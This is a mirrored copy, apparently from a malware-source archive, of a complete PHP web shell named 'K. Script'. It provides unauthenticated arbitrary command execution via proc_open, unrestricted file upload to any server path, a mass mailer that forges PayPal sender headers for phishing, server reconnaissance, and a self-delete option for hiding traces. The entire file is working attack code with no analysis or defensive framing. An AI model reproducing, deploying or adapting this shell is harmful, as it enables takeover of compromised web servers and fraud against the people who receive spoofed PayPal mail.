mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 06:55:27 +00:00
403 lines
18 KiB
Plaintext
403 lines
18 KiB
Plaintext
<?php
|
|
$Title = "K. Script v0.3 Beta By $alla$$: ";
|
|
$GraphicHeader = '<meta http-equiv="Content-Type" content="text/html; charset=windows-1257">
|
|
<style type="text/css">
|
|
body{ background-color: #F6F6F6; text-align: center; width: 100%; padding: 0px; margin: 0px; }
|
|
#unCenter{ width: 300px; margin-left: auto; margin-right: auto; text-align: left; }
|
|
#unCenterShell{ width: 600px; margin-left: auto; margin-right: auto; text-align: left; }
|
|
#unCenterMailer{ width: 700px; margin-left: auto; margin-right: auto; text-align: left; }
|
|
#unCenterProxy{ width: 750px; margin-left: auto; margin-right: auto; }
|
|
#unCenterHeader{ width: 800px; margin-left: auto; margin-right: auto; text-align: center; }
|
|
.Marged{ margin-top: 20px; }
|
|
.Input{ border: 1px solid #DADADA; }
|
|
.Table{ border: 1px solid #DADADA; background-color: White; padding: 10px; font: 11px Tahoma, Verdana, sans-serif; line-height: 17px; color: Gray; }
|
|
.TableHeader{ border: 1px solid #DADADA; background-color: White; padding: 2px; font: 11px Tahoma, Verdana, sans-serif; line-height: 17px; color: Gray; }
|
|
a{ text-decoration: none; color: #003473; }
|
|
a:hover{ text-decoration: none; color: #F5822B;}
|
|
img{ border: 0px; }
|
|
h1{ font-size: 14px; font-weight: bold; padding: 0px; margin-bottom: 7px; }
|
|
.Black{ color: Gray; font: 11px Tahoma, Verdana, sans-serif; }
|
|
.BlackRealy{ color: Black; font: 12px Tahoma, Verdana, sans-serif; }
|
|
</style>';
|
|
$SiteHeader = '</head><body><br>
|
|
<a href="?MainPage"><img src="http://kenshin-lt.net/images/fuck.gif" width="50" height="50" alt="Home"></a>
|
|
<div><hr width="90%" size="1.5px" noshade="noshade"></div>';
|
|
$GraphicFooter = '<div><br><hr width="90%" size="1.5px" noshade="noshade"></div>
|
|
<div align="center" class="black">[<a href="?ProxyDetect">ProxyDetect</a>]
|
|
<span class="BlackRealy"> | </span>[<a href="?Uploader">FileUploader</a>]
|
|
<span class="BlackRealy"> | </span>[<a href="?PHPShell">PHPShell</a>]
|
|
<span class="BlackRealy"> | </span>[<a href="?PortCheck">PortCheck</a>]
|
|
<span class="BlackRealy"> | </span>[<a href="?Mailer">MassMailer</a>]
|
|
<span class="BlackRealy"> | </span>[<a href="?DeleteMe">Delete Me</a>]</div>
|
|
<div align="center" class="Black">Copyright © 2007 <a href="mailto:shaun.wades@gmail.com">Shaun$$</a></div>
|
|
</body></html>';
|
|
$Slash = '/';
|
|
|
|
if ($_SERVER['QUERY_STRING'] == '') header("Location: http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?MainPage");
|
|
|
|
if(isset($_GET['PHPShell'])) {
|
|
$passwd = array();
|
|
$aliases = array();
|
|
session_start();
|
|
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
|
|
$_SESSION['cwd'] = getcwd();
|
|
$_SESSION['history'] = array();
|
|
$_SESSION['output'] = '';
|
|
}
|
|
if (!empty($_REQUEST['command'])) {
|
|
if (get_magic_quotes_gpc()) {
|
|
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
|
|
}
|
|
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
|
|
unset($_SESSION['history'][$i]);
|
|
array_unshift($_SESSION['history'], $_REQUEST['command']);
|
|
$_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
|
|
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
|
|
$_SESSION['cwd'] = dirname(__FILE__);
|
|
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
|
|
if ($regs[1][0] == '/') {
|
|
$new_dir = $regs[1];
|
|
} else {
|
|
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
|
|
}
|
|
while (strpos($new_dir, '/./') !== false)
|
|
$new_dir = str_replace('/./', '/', $new_dir);
|
|
while (strpos($new_dir, '//') !== false)
|
|
$new_dir = str_replace('//', '/', $new_dir);
|
|
while (preg_match('|/\.\.(?!\.)|', $new_dir))
|
|
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
|
|
if ($new_dir == '') $new_dir = '/';
|
|
if (@chdir($new_dir)) {
|
|
$_SESSION['cwd'] = $new_dir;
|
|
} else {
|
|
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
|
|
}
|
|
} else {
|
|
chdir($_SESSION['cwd']);
|
|
$length = strcspn($_REQUEST['command'], " \t");
|
|
$token = substr($_REQUEST['command'], 0, $length);
|
|
if (isset($aliases[$token]))
|
|
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
|
|
$p = proc_open($_REQUEST['command'],
|
|
array(1 => array('pipe', 'w'),
|
|
2 => array('pipe', 'w')),
|
|
$io);
|
|
while (!feof($io[1])) {
|
|
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
|
|
ENT_COMPAT, 'UTF-8');
|
|
}
|
|
while (!feof($io[2])) {
|
|
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
|
|
ENT_COMPAT, 'UTF-8');
|
|
}
|
|
fclose($io[1]);
|
|
fclose($io[2]);
|
|
proc_close($p);
|
|
}
|
|
}
|
|
if (empty($_SESSION['history'])) {
|
|
$js_command_hist = '""';
|
|
} else {
|
|
$escaped = array_map('addslashes', $_SESSION['history']);
|
|
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
|
|
}
|
|
|
|
|
|
echo '<xml version="1.0" encoding="UTF-8">';
|
|
echo '<html><head><title>'.$Title.' PHPShell</title>';
|
|
echo $GraphicHeader;
|
|
?>
|
|
|
|
<script type="text/javascript" language="JavaScript">
|
|
var current_line = 0;
|
|
var command_hist = new Array(<?php echo $js_command_hist ?>);
|
|
var last = 0;
|
|
function key(e) {
|
|
if (!e) var e = window.event;
|
|
if (e.keyCode == 38 && current_line < command_hist.length-1) {
|
|
command_hist[current_line] = document.shell.command.value;
|
|
current_line++;
|
|
document.shell.command.value = command_hist[current_line];
|
|
}
|
|
if (e.keyCode == 40 && current_line > 0) {
|
|
command_hist[current_line] = document.shell.command.value;
|
|
current_line--;
|
|
document.shell.command.value = command_hist[current_line];
|
|
}
|
|
}
|
|
function init() {
|
|
document.shell.setAttribute("autocomplete", "off");
|
|
document.shell.output.scrollTop = document.shell.output.scrollHeight;
|
|
document.shell.command.focus();
|
|
}
|
|
</script>
|
|
<? echo $SiteHeader; ?>
|
|
<body onload="init()">
|
|
<?php
|
|
error_reporting (E_ALL);
|
|
if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 10;
|
|
?>
|
|
<div id="unCenterShell"><div class="Marged"><div class="Table">
|
|
<center><div>Current Directory: <?php echo $_SESSION['cwd'] ?></div></center>
|
|
</div></div></div>
|
|
|
|
<div id="unCenterShell"><div class="Marged"><div class="Table"><center>
|
|
<div><form name="shell" action="<?php echo $_SERVER['PHP_SELF'] .'?PHPShell'?>" method="post"></div>
|
|
<div><textarea class="Input" name="output" readonly="readonly" cols="68" rows="<?php echo $_REQUEST['rows'] ?>">
|
|
<?php
|
|
$lines = substr_count($_SESSION['output'], "\n");
|
|
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
|
|
echo rtrim($padding . $_SESSION['output']);
|
|
?>
|
|
</textarea></div>
|
|
<div>$ <input class="Input" name="command" type="text" onkeyup="key(event)" size="89" tabindex="1"><div>
|
|
</center></div></div></div>
|
|
|
|
|
|
<div id="unCenter"><div class="Marged"><div class="Table"><center>
|
|
<div><input type="submit" value="Execute Command" /> <input type="submit" name="reset" value="Reset" /></div>
|
|
<div>Rows: <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" /></div>
|
|
</form></center></div></div></div>
|
|
<? echo $GraphicFooter; }
|
|
|
|
|
|
if(isset($_GET['Uploader'])){
|
|
echo '<html><head><title>'.$Title.' Uploader</title>';
|
|
echo $GraphicHeader; echo $SiteHeader;
|
|
|
|
if(isset($_POST['upl_files'])){
|
|
echo '<div id="unCenter"><div class="Marged"><div class="Table">
|
|
<div>Uploaded Files:<br></div>';
|
|
//print_r($_FILES['file_n']);
|
|
$up_mas = $_FILES['file_n'];
|
|
$mas_name = array();
|
|
$mas_tmp = array();
|
|
for($i=0; $i<10; $i++){
|
|
if(!empty($up_mas['name'][$i])){
|
|
$j = count($mas_name);
|
|
$mas_name[$j] = $up_mas['name'][$i];
|
|
$mas_tmp[$j] = $up_mas['tmp_name'][$i];
|
|
}
|
|
}
|
|
for($i=0; $i<count($mas_name); $i++){
|
|
$upl_file = $_POST['mas_dir'].$mas_name[$i];
|
|
if(move_uploaded_file($mas_tmp[$i], $upl_file)){
|
|
echo '<a href="'.$mas_name[$i].'">'.$mas_name[$i].'</a>, ';
|
|
}
|
|
}
|
|
}
|
|
echo "</div></div></div>";
|
|
?>
|
|
<div id="unCenter"><div class="Marged"><div class="Table"><center><br>
|
|
<form enctype="multipart/form-data" method="post" action="">
|
|
<div>Upload Files to:
|
|
<? echo'<input class="input" type="text" name="mas_dir" value='.getcwd().$Slash.' size="40"><br><br>'; ?>
|
|
<? for($i=0; $i<10; $i++){ echo '<div><input class="Input" type="file" name="file_n[]"></div>'; } ?>
|
|
</div><div><input type="reset" name="reset" value="Reset"> <input type="submit" name="upl_files" value="upload"></div>
|
|
</center></div></div></div>
|
|
<? echo $GraphicFooter; }
|
|
|
|
|
|
if(isset($_GET['MainPage'])){
|
|
echo '<html><head><title>'.$Title.'</title>';
|
|
echo $GraphicHeader; echo $SiteHeader;
|
|
|
|
print "<div id=unCenterHeader><div class=TableHeader>";
|
|
print((@ini_get('safe_mode'))?("<b>Safe Mode: <font color=green>ON</font><b>"):("<b>Safe Mode: <font color=red>OFF</font>"));
|
|
print "</b><span class=BlackRealy> | </span>";
|
|
print "<b>PHP version: <font color=green>".@phpversion()."</font></b>";
|
|
print "<span class=BlackRealy> | </span>";
|
|
print((@function_exists('curl_version'))?("<b>cURL: <font color=green>ON</font>"):("<b>cURL: <font color=red>OFF</font>"));
|
|
print "</b><span class=BlackRealy> | </span>";
|
|
if(@function_exists('mysql_connect')){ echo "<b>MySQL: <font color=green>ON</font>"; } else { echo "<b>MySQL: <font color=red>OFF</font>"; }
|
|
print "</b><span class=BlackRealy> | </span>";
|
|
if(@function_exists('mssql_connect')){ echo "<b>MSSQL: <font color=green>ON</font>"; } else { echo "<b>MSSQL: <font color=red>OFF</font>"; }
|
|
print "</b><span class=BlackRealy> | </span>";
|
|
if(@function_exists('pg_connect')){ echo "<b>PostgreSQL: <font color=green>ON</font>"; } else { echo "<b>PostgreSQL: <font color=red>OFF</font>";}
|
|
print "</b><span class=BlackRealy> | </span>";
|
|
if(@function_exists('ocilogon')){ echo "<b>Oracle: <font color=green>ON</font>"; } else { echo "<b>Oracle: <font color=red>OFF</font>"; }
|
|
print "</b></b></div></div>";
|
|
|
|
echo<<<MainPageGraphic
|
|
<div id="unCenter">
|
|
<div class="Marged">
|
|
<div class="Table">
|
|
<center>
|
|
<div></div>
|
|
<div><a href="?ProxyDetect">ProxyDetect</a></div>
|
|
<div><a href="?Uploader">FileUploader</a></div>
|
|
<div><a href="?PHPShell">PHPShell</a></div>
|
|
<div><a href="?PortCheck">PortCheck</a></div>
|
|
<div><a href="?Mailer">MassMailer</a></div>
|
|
<div><hr width="150px" size="1px" noshade="noshade"></div>
|
|
<div><a href="?DeleteMe">Delete me</a></div>
|
|
</center>
|
|
</div>
|
|
</div>
|
|
</div>
|
|
MainPageGraphic;
|
|
echo $GraphicFooter; }
|
|
|
|
|
|
if(isset($_GET['PortCheck'])) {
|
|
echo '<html><head><title>'.$Title.' PortCheck</title>';
|
|
echo $GraphicHeader; echo $SiteHeader;
|
|
echo "<div id=\"unCenter\"><div class=\"Marged\"><div class=\"Table\" style=\"padding-left: 20\">";
|
|
echo "<div align=\"center\">Under Reconstruction</div>";
|
|
echo "</div></div></div>";
|
|
echo $GraphicFooter;
|
|
}
|
|
|
|
if(isset($_GET['Mailer'])) {
|
|
echo '<html><head><title>'.$Title.' Mailer</title>';
|
|
echo $GraphicHeader;
|
|
echo $SiteHeader;
|
|
|
|
if(!$action) $action = "";
|
|
|
|
if ($action=="send"){
|
|
$message = urlencode($message);
|
|
$message = ereg_replace("%5C%22", "%22", $message);
|
|
$message = urldecode($message);
|
|
$message = stripslashes($message);
|
|
$subject = stripslashes($subject);
|
|
}
|
|
?>
|
|
<!-- Mailer -->
|
|
<form name="Mailer" method="post" action="<? echo $_SERVER['PHP_SELF'] . '?Mailer' ?>" enctype="multipart/form-data">
|
|
|
|
<div id="unCenterMailer"><div class="Marged"><div class="Table">
|
|
<div align="left">
|
|
<div style="padding-left: 20px;">Your Email: <input class="input" type="text" name="from" value="<?=$from?>" size="20">
|
|
<span style="padding-left: 122px;"></span>Your Name: <input class="input" type="text" name="realname" value="<?=$realname?>" size="20"></div>
|
|
<div style="padding-left: 26px;">Reply-To: <input class="input" type="text" name="replyto" value="<?=$replyto?>" size="20">
|
|
<span style="padding-left: 123px;"></span>Attach File: <input class="input" type="file" name="file" size="20"></div>
|
|
<div style="padding-left: 33px;">Subject: <input class="input" type="text" name="subject" value="<?=$subject?>" size="90"></div>
|
|
</div>
|
|
<div align="left"><span style="padding-left: 4px;"></span>Letter:<span style="padding-left: 392px;"></span>Recipients:</div>
|
|
<div><textarea class="input" name="message" cols="50" rows="10"><?=$message?></textarea>
|
|
<textarea class="input" name="emaillist" cols="25" rows="10"><?=$emaillist?></textarea></div>
|
|
</div></div></div>
|
|
|
|
<div id="unCenter"><div class="Marged"><div class="Table">
|
|
<div align="center"><input type="radio" name="contenttype" value="plain">Plain
|
|
<input type="radio" name="contenttype" value="html" checked>HTML
|
|
<input type="hidden" name="action" value="send"><input class="input" type="submit" value="Send eMails"></div>
|
|
</div></div></div></form>
|
|
<?
|
|
if ($action=="send"){
|
|
|
|
if (!$from && !$subject && !$message && !$emaillist){
|
|
echo '<div id="unCenter"><div class="Marged"><div class="Table"><center>
|
|
<div>Please complete all fields before sending your message.</div>
|
|
</center></div></div></div>';
|
|
echo $GraphicFooter;
|
|
exit;
|
|
}
|
|
|
|
$allemails = split("\n", $emaillist);
|
|
$numemails = count($allemails);
|
|
|
|
If ($file_name){
|
|
@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
|
|
$content = fread(fopen($file,"r"),filesize($file));
|
|
$content = chunk_split(base64_encode($content));
|
|
$uid = strtoupper(md5(uniqid(time())));
|
|
$name = basename($file);
|
|
}
|
|
echo '<div id="unCenter"><div class="Marged"><div class="Table"><center>';
|
|
|
|
$messid = "1140150615.28818";
|
|
|
|
for($x=0; $x<$numemails; $x++){
|
|
$to = $allemails[$x];
|
|
if ($to){
|
|
$to = ereg_replace(" ", "", $to);
|
|
$message = ereg_replace("&email&", $to, $message);
|
|
$subject = ereg_replace("&email&", $to, $subject);
|
|
print "Sending: [ $to ] ";
|
|
flush();
|
|
$header = "From: $realname <$from>\r\n";
|
|
$header .= "Reply-To: $replyto\r\n";
|
|
$header .= "MIME-Version: 1.0\r\n";
|
|
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
|
|
If ($file_name) $header .= "--$uid\r\n";
|
|
$header .= "Message-Id:<$messid@paypal.com>\r\n";
|
|
$header .= "Return-Path: <service@paypal.com>\r\n";
|
|
$header .= "Content-Type: text/$contenttype\r\n";
|
|
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
|
|
$header .= "$message\r\n";
|
|
If ($file_name) $header .= "--$uid\r\n";
|
|
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
|
|
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
|
|
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
|
|
If ($file_name) $header .= "$content\r\n";
|
|
If ($file_name) $header .= "--$uid--";
|
|
mail($to, $subject, "", $header);
|
|
print "........Success!<br>";
|
|
flush();
|
|
}
|
|
}
|
|
echo "</center></div></div></div>";
|
|
}
|
|
?>
|
|
<!-- </Mailer> -->
|
|
<? echo $GraphicFooter; } ?>
|
|
|
|
<? if(isset($_GET['DeleteMe'])){
|
|
echo '<html><head><title>'.$Title.' DeleteMe</title>';
|
|
echo $GraphicHeader; echo $SiteHeader;
|
|
$del = $_GET['del'];
|
|
if($del=="TRUE"){
|
|
$url = "http://" .$_SERVER['HTTP_HOST']. "/";
|
|
print "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0; URL= $url \">";
|
|
unlink('kscr.php');
|
|
}
|
|
?>
|
|
|
|
<div id="unCenter"><div class="Marged"><div class="Table">
|
|
<center><div></div>
|
|
<div style="font-size 10px: bold; font-weight: bold;">Delete Me?</div>
|
|
<br><div><a href="?DeleteMe&del=TRUE">Yes (Delete)</a><img src="" border="0" height="0" width="50"><a href="?MainPage">No (Go Home)</a></div>
|
|
</center></div></div></div>
|
|
|
|
<? echo $GraphicFooter; } ?>
|
|
|
|
<? if(isset($_GET['ProxyDetect'])){
|
|
echo $GraphicHeader; echo $SiteHeader;
|
|
echo '<html><head><title>'.$Title.' ProxyDetect</title>';
|
|
?>
|
|
|
|
<div id="unCenterProxy"><div class="Marged"><div class="Table">
|
|
<div class="Menu" align=center><b><u>Your IP Address:</u></b><br><br></div>
|
|
|
|
<?
|
|
$proxy = "";
|
|
$viaproxy = "";
|
|
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) $proxy = TRUE;
|
|
if($proxy) $viaproxy = "Via Proxy";
|
|
$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
|
$ip = getenv("REMOTE_ADDR");
|
|
if($host==$ip) $host = "N/A";
|
|
echo "<div align=center ><b>".$ip." (".$host.")</b>".$viaproxy."</div>";
|
|
?>
|
|
|
|
<hr size=1 width=80%><br>
|
|
<div class=Menu align=center><b><u>Your HTTP Headers:</u></b><br><br/></div>
|
|
<div align="left" style="padding-left: 10px">
|
|
<?
|
|
if(!empty($_SERVER['HTTP_CONNECTION'])) echo "<li> <span style=\"color: Black;\">HTTP_CONNECTION: </span><b>".$_SERVER['HTTP_CONNECTION']."</b><br>";
|
|
if(!empty($_SERVER['HTTP_KEEP_ALIVE'])) echo "<li> <span style=\"color: Black;\">HTTP_KEEP_ALIVE: </span><b>".$_SERVER['HTTP_KEEP_ALIVE']."</b><br>";
|
|
if(!empty($_SERVER['HTTP_ACCEPT'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT: </span><b>".$_SERVER['HTTP_ACCEPT']."</b><br>";
|
|
if(!empty($_SERVER['HTTP_ACCEPT_CHARSET'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT_CHARSET: </span><b>".$_SERVER['HTTP_ACCEPT_CHARSET']."</b><br>";
|
|
if(!empty($_SERVER['HTTP_ACCEPT_ENCODING'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT_ENCODING: </span><b>".$_SERVER['HTTP_ACCEPT_ENCODING']."</b><br>";
|
|
if(!empty($_SERVER['HTTP_ACCEPT_LANGUAGE'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT_LANGUAGE: </span><b>".$_SERVER['HTTP_ACCEPT_LANGUAGE']."</b><br>";
|
|
if(!empty($_SERVER['HTTP_HOST'])) echo "<li> <span style=\"color: Black;\">HTTP_HOST: </span><b>".$_SERVER['HTTP_HOST']."</b><br>";
|
|
if(!empty($_SERVER['HTTP_USER_AGENT'])) echo "<li> <span style=\"color: Black;\">HTTP_USER_AGENT: </span><b>".$_SERVER['HTTP_USER_AGENT']."</b><br>";
|
|
if($proxy) echo "<li> <span style=\"color: Black;\">HTTP_X_FORWARDED_FOR: </span><b>".$_SERVER['HTTP_X_FORWARDED_FOR']."</b><br>";
|
|
if (($proxy) && (!empty($_SERVER['HTTP_VIA']))){ echo "<li> <span style=\"color: Black;\">HTTP_VIA: </span><b>".$_SERVER['HTTP_VIA']."</b><br>"; }
|
|
?>
|
|
</div></div></div></div>
|
|
|
|
<? echo $GraphicFooter; } exit;?>
|